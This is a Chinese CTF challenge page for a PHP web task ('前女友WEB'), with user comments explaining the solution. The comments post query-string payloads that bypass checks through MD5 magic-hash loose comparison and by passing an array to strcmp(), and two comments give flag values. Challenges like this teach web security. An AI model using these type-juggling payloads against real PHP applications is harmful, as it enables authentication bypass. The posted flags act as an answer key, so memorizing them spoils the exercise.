前女友WEB 未解决

分数: 30 金币: 3
题目作者: 未知
一  血: chounana
一血奖励: 2金币
解  决: 4830
提  示:
描  述:
来源 山科大ctf
评论
HK1ng 5天前

首先CTRL+U查看源码,发现存在超链接,点击进去之后,代码审计,第一关是md5弱类型比较,然后用了strcmp()函数进行弱类型比较,直接传一个数组,PHP 8.0 前 strcmp() 会返回 null,加上取反,直接绕过。

回复 0

goodsnack 14天前

弱类型比较,传数组即可

回复 0

harven 23天前

http://example.com/?v1=QNKCDZO&v2=240610708&v3[]=test

回复 0

smtall 1月前

用deepseek做出来了

回复 2

大棕兔爸爸 1月前

存在两个漏洞点:1. md5的松散比较绕过;2. strcmp的类型漏洞导致比较结果为0。攻击者需要同时利用这两个漏洞才能获取到flag。 完整Payload: ?v1=240610708&v2=QNKCDZO&v3[]=abc

回复 1

welltian 4月前

/?v1=QNKCDZO&v2=240610708&v3[]=123

回复 0

33555 4月前

/?v1[]=1&v2[]=2&v3[]=1flag{f78a31880b6bf8800597a997e130155f}

回复 0

APTX4869ZRC 4月前

index.php?v1[]=QLTHNDT&v2[]=UTIPEZQ&v3[]=EEIZDOI

回复 0

fenmusm 5月前

/?v1[]=1&v2[]=2&v3[]=3

回复 1

Jacob811 5月前

flag{23d6defe4ed15e2f857de57a7b576dfb}

回复 0

WriteUp

image
harry

3 金币

评分(10)

解题动态

bugkuL303 攻破了该题 52秒前
yuanyouzi 攻破了该题 5分钟前
hulihaha 攻破了该题 1小时前
lindaxu 攻破了该题 1小时前
RanLuo 攻破了该题 1小时前
摇曳露营芝麻凛 攻破了该题 3小时前
789123 攻破了该题 1天前
16690595968 攻破了该题 1天前
菜薯为什么 攻破了该题 1天前
weiyouzhunze 攻破了该题 1天前
lhhy 攻破了该题 1天前
whole 攻破了该题 1天前
liuliuliu666 攻破了该题 2天前
pspp 攻破了该题 2天前
随琉 攻破了该题 2天前
tracyfuli 攻破了该题 2天前
17318699598 攻破了该题 2天前
Floralsea 攻破了该题 2天前
来找花海 攻破了该题 2天前
daidai0204 攻破了该题 2天前
问题反馈